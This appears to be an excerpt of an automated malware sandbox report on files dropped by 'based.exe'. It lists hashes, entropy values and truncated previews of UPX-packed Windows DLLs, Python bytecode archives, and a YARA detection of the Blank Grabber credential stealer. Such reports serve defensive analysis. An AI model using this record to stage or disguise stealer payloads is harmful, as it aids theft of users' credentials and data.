                                                                                        Category:dropped
                                                                                        Size (bytes):109848
                                                                                        Entropy (8bit):7.940033692006014
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:2cBkCziCnitddhSqZDd5jgejo8y04krK6p5DiIYOqgC9c:/ICiLzSCHjg95Zy9DHCK
                                                                                        MD5:8B623D42698BF8A7602243B4BE1F775D
                                                                                        SHA1:F9116F4786B5687A03C75D960150726843E1BC25
                                                                                        SHA-256:7C2F0A65E38179170DC69E1958E7D21E552ECA46FCF62BBB842B4F951A86156C
                                                                                        SHA-512:AA1B497629D7E57B960E4B0AB1EA3C28148E2D8EBD02905E89B365F508B945A49AACFBD032792101668A32F8666F8C4EF738DE7562979B7CF89E0211614FA21A
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...c..f.........." ...&.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36632
                                                                                        Entropy (8bit):7.6509624792548525
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:46bvUQL1bqnnrXTvDpovwIYOI7O5YiSyvPAAMxkEXm:3MQRbqnzSvwIYOI7k7Syuxrm
                                                                                        MD5:D71DF4F6E94BEA5E57C267395AD2A172
                                                                                        SHA1:5C82BCA6F2CE00C80E6FE885A651B404052AC7D0
                                                                                        SHA-256:8BC92B5A6C1E1C613027C8F639CD8F9F1218FC4F7D5526CFCB9C517A2E9E14C2
                                                                                        SHA-512:E794D9AE16F9A2B0C52E0F9C390D967BA3287523190D98279254126DB907BA0E5E87E5525560273798CC9F32640C33C8D9F825FF473524D91B664FE91E125549
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.@:.r.:.r.:.r.3c..>.r.<.s.8.r.<.w.6.r.<.v.2.r.<.q.9.r.U.s.8.r.qcs.8.r...s.9.r.:.s...r.U...;.r.U.r.;.r.U...;.r.U.p.;.r.Rich:.r.........PE..d......f.........." ...&.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):88344
                                                                                        Entropy (8bit):7.9169630929403905
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:hrahPO+MVHyw7e8z0RvFCbqZizJDhNvf2sAwwh0ZmHNzay0IYZ1dP7Syexg:dChw7ey0RvwqWDbvOfh0ZmmIYZ1dPf
                                                                                        MD5:932147AC29C593EB9E5244B67CF389BB
                                                                                        SHA1:3584FF40AB9AAC1E557A6A6009D10F6835052CDE
                                                                                        SHA-256:BDE9BCCB972D356B8DE2DC49A4D21D1B2F9711BBC53C9B9F678B66F16CA4C5D3
                                                                                        SHA-512:6E36B8D8C6DC57A0871F0087757749C843EE12800A451185856A959160F860402AA16821C4EA659EA43BE2C44FCDB4DF5C0F889C21440ACEB9EE1BC57373263C
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MR..MR..MR..D*..IR..K..OR..K..AR..K..ER..K..NR.."..NR...*..OR..MR..+R.."..wR.."..LR..".j.LR.."..LR..RichMR..........PE..d......f.........." ...&. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26392
                                                                                        Entropy (8bit):7.480704744374842
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:R13R9VFPoCaHJ0Q8AfWmZa7gJXxjIYQU7NUHQIYiSy1pCQd8AM+o/8E9VF0NyOUF:R53PdYc0phjIYQU7A5YiSyvyAMxkEbF
                                                                                        MD5:0E5997263833CE8CE8A6A0EC35982A37
                                                                                        SHA1:96372353F71AAA56B32030BB5F5DD5C29B854D50
                                                                                        SHA-256:0489700A866DDDFA50D6EE289F7CCA22C6DCED9FA96541B45A04DC2FFB97122E
                                                                                        SHA-512:A00A667CC1BBD40BEFE747FBBC10F130DC5D03B777CBE244080498E75A952C17D80DB86AA35F37B14640ED20EF21188EA99F3945553538E61797B575297C873F
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..........................PE..d...f..f.........." ...&.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):44312
                                                                                        Entropy (8bit):7.700849446491776
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:MKyC5RumAPKm822kI+Ud/erhgTF0GTp0G3IYLwWFi5YiSyvlcAMxkE3:zyC5u25/eWGFG3IYLwWFA7Syt6xr
                                                                                        MD5:2957B2D82521ED0198851D12ED567746
                                                                                        SHA1:AD5FD781490EE9B1AD2DD03E74F0779FB5F9AFC2
                                                                                        SHA-256:1E97A62F4F768FA75BAC47BBA09928D79B74D84711B6488905F8429CD46F94A2
                                                                                        SHA-512:B557CF3FE6C0CC188C6ACC0A43B44F82FCF3A6454F6ED7A066D75DA21BB11E08CFA180699528C39B0075F4E79B0199BB05E57526E8617036411815AB9F406D35
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:!..~@..~@..~@..w8@.x@..x...|@..x...s@..x...v@..x...}@......|@..~@...@..58..y@.......@.......@....,..@.......@..Rich~@..........PE..d......f.........." ...&.p.......... m....................................................`.............................................P.......h............ ..x...........X.......................................0y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):57624
                                                                                        Entropy (8bit):7.833716372263874
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:gaNI38PtvAFUbpFPJQFh6aw3gQcIYOQGA7SyixA:ga7FA2QT6ZQjIYOQGAX
                                                                                        MD5:A9D2C3CF00431D2B8C8432E8FB1FEEFD
                                                                                        SHA1:1C3E2FE22E10E1E9C320C1E6F567850FD22C710C
                                                                                        SHA-256:AA0611C451B897D27DD16236CE723303199C6EACFC82314F342C7338B89009F3
                                                                                        SHA-512:1B5ADA1DAC2AB76F49DE5C8E74542E190455551DFD1DFE45C9CCC3EDB34276635613DBCFADD1E5F4383A0D851C6656A7840C327F64B50B234F8FDD469A02EF73
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~...~...~....0..~.......~....^..~.......~.......~.......~.......~.......~...~...........~.......~....\..~.......~..Rich.~..........................PE..d......f.........." ...&.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):67352
                                                                                        Entropy (8bit):7.859216264746876
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:ZdfustCsOUkZ4DZ718l4TFCF6VKbrMIYC7tle7Sy+x7CY:ZRuWCsOjmZ7g446QAIYC7tM0CY
                                                                                        MD5:E5F6BFF7A8C2CD5CB89F40376DAD6797
                                                                                        SHA1:B854FD43B46A4E3390D5F9610004010E273D7F5F
                                                                                        SHA-256:0F8493DE58E70F3520E21E05D78CFD6A7FCDE70D277E1874183E2A8C1D3FB7D5
                                                                                        SHA-512:5B7E6421AD39A61DABD498BD0F7AA959A781BC82954DD1A74858EDFEA43BE8E3AFE3D0CACB272FA69DC897374E91EA7C0570161CDA7CC57E878B288045EE98D9
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d......f.........." ...&.........@.......P...................................0............`.........................................l,..d....)....... ..........D............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):1443565
                                                                                        Entropy (8bit):5.590585212949354
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfbM3AOwjwhBdmzRPFaUHHd:mQR5pE/RtQ/P
                                                                                        MD5:4B011F052728AE5007F9EC4E97A4F625
                                                                                        SHA1:9D940561F08104618EC9E901A9CD0CD13E8B355D
                                                                                        SHA-256:C88CD8549DEBC046A980B0BE3BF27956AE72DCDCF1A448E55892194752C570E6
                                                                                        SHA-512:BE405D80D78A188A563086809C372C44BCD1CCAB5A472D50714F559559795A1DF49437C1712E15EB0403917C7F6CFAF872D6BB0C8E4DD67A512C2C4A5AE93055
                                                                                        Malicious:false
                                                                                        Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):121713
                                                                                        Entropy (8bit):7.639981505326483
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:dPQCyGI/XpihbF1V5ekEnIc5U34CYqadj7PJWUkRctXhPKU66:dPehUV3Evr3JAK9tKU66
                                                                                        MD5:8AFB40DB96AAD7E40E7DAF470AB53946
                                                                                        SHA1:691371C492DF3AA2EDB5B74255A2378DB40086E0
                                                                                        SHA-256:D0D6AEB318DEB3275E523B318B4BFC33238B2D8BBE6B38D21239685EE98466D2
                                                                                        SHA-512:D182F71B89B2B432789A5DA036370D2F8B20C5DF26A450049C2AC6BF18574CF94C0841ED16C2FAB051CC96F18BE6B6F2D924459EDF089E035232D6119853969B
                                                                                        Malicious:false
                                                                                        Preview:PK...........XRJ..............stub-o.pyc........1.Uf_1........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1635096
                                                                                        Entropy (8bit):7.95287803315892
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                                                        MD5:7F1B899D2015164AB951D04EBB91E9AC
                                                                                        SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
                                                                                        SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
                                                                                        SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):29968
                                                                                        Entropy (8bit):7.677818197322094
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                        MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                        SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                        SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                        SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):228120
                                                                                        Entropy (8bit):7.928688904391487
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
                                                                                        MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
                                                                                        SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
                                                                                        SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
                                                                                        SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1713432
                                                                                        Entropy (8bit):7.993772635826383
                                                                                        Encrypted:true
                                                                                        SSDEEP:49152:ourykeLOskGnvqFtCxkwGrZ84z4Kzov9ra:9rmLFpvqFtwkwGr74TM
                                                                                        MD5:CCDBD8027F165575A66245F8E9D140DE
                                                                                        SHA1:D91786422CE1F1AD35C528D1C4CD28B753A81550
                                                                                        SHA-256:503CD34DAED4F6D320731B368BBD940DBAC1FF7003321A47D81D81D199CCA971
                                                                                        SHA-512:870B54E4468DB682B669887AEEF1FFE496F3F69B219BDA2405AC502D2DCD67B6542DB6190EA6774ABF1DB5A7DB429CE8F6D2FC5E88363569F15CF4DF78DA2311
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oX..+9..+9..+9..-...)9..-.s.%9..-...'9..-...#9..-.../9.."A..19..`A.. 9..+9..I8..D....9..D...*9..D.q.*9..D...*9..Rich+9..........PE..d...O..f.........." ...&. ........E. /^.. E.................................. _...........`.........................................HO^......I^......@^......0W.p0..........(._.....................................8;^.@...........................................UPX0......E.............................UPX1..... ... E.....................@....rsrc........@^......"..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):630736
                                                                                        Entropy (8bit):6.409476333013752
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                        MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                        SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                        SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                        SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):456
                                                                                        Entropy (8bit):4.447296373872587
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                        MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                        SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                        SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                        SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key, Author: Joe Security
                                                                                        Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26392
                                                                                        Entropy (8bit):7.425924737621776
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:zKWIzVcBuVEZhWsKZa7gJXJDNIYQG76eHQIYiSy1pCQuRWAM+o/8E9VF0NyMl+:zKLVKZhWtpZDNIYQG7H5YiSyvHAMxkEN
                                                                                        MD5:E021CF8D94CC009FF79981F3472765E7
                                                                                        SHA1:C43D040B0E84668F3AE86ACC5BD0DF61BE2B5374
                                                                                        SHA-256:AB40BF48A6DB6A00387AECE49A03937197BC66B4450559FEEC72B6F74FC4D01E
                                                                                        SHA-512:C5CA57F8E4C0983D9641412E41D18ABD16FE5868D016A5C6E780543860A9D3B37CC29065799951CB13DC49637C45E02EFB6B6FFEAF006E78D6CE2134EB902C67
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d...g..f.........." ...&.0..........`.....................................................`......................................... ...L....................`..............l.......................................p...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):660248
                                                                                        Entropy (8bit):7.99315829587293
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:BTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMccKNjgG:BTdlyK5oFVDQ4GGYsaejd1/oeKQjgG
                                                                                        MD5:74B347668B4853771FEB47C24E7EC99B
                                                                                        SHA1:21BD9CA6032F0739914429C1DB3777808E4806B0
                                                                                        SHA-256:5913EB3F3D237632C2F0D6E32CA3E993A50B348033BB6E0DA8D8139D44935F9E
                                                                                        SHA-512:463D8864ADA5F21A70F8DB15961A680B00EE040A41EA660432D53D0EE3CCD292E6C11C4EC52D1D848A7D846AD3CAF923CBC38535754D65BBE190E095F5ACB8C3
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d......f.........." ...&.....0............................................................`..............................................#......................h.......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\ProgramData\Microsoft\based.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):302360
                                                                                        Entropy (8bit):7.985785632382362
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:49ZYAfLNgtllsyylxgsElkuO9Mj9SMDQCaCAjEaukkCTq/kP0zqEuv2urp:zATNgtIyylKsEeuEIDNafERxuRvdrp
                                                                                        MD5:BC28491251D94984C8555ED959544C11
                                                                                        SHA1:964336B8C045BF8BB1F4D12DE122CFC764DF6A46
                                                                                        SHA-256:F308681EF9C4BB4EA6ADAE93939466DF1B51842554758CB2D003131D7558EDD4
                                                                                        SHA-512:042D072D5F73FE3CD59394FC59436167C40B4E0CF7909AFCAD1968E0980B726845F09BF23B4455176B12083A91141474E9E0B7D8475AFB0E3DE8E1E4DBAD7EC0
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d...h..f.........." ...&.`.......@.......P................................................`.............................................X....................P..T.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
